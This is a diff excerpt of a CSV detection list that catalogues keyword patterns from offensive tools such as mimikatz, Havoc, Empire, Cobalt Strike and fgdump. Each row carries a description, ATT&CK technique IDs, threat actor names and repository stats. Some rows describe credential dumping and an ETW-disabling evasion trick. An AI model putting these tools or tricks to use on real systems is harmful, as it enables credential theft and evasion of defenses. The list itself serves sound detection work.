-"*ServiceHavoc.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
+"*service::me*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*service::preshutdown*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*service::remove*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*service::resume*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::shutdown*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::start*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::stop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::suspend*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service_permissions_escalate.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ServiceHavoc.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*servicemove*hid.dll*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*servpw.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*servpw64.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -16383,23 +16566,23 @@ "*SessionGopher.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*set * virus_scanner*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*set AutoRunScript multi_console_command -rc /root/*.rc*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*set CertPath data/*","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - 
T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*set CollectionMethodAll*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*set CertPath data/*","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - 
T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*set CollectionMethodAll*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*set COMPlus_ETWEnabled=0*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*set havoc *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*set havoc *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*set hosts_stage*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*set keylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set keylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*set LFILE /*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Set Listener dbx*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*set Listener onedrive*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - 
T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*set obfuscate *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group 
- APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*set obfuscate *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 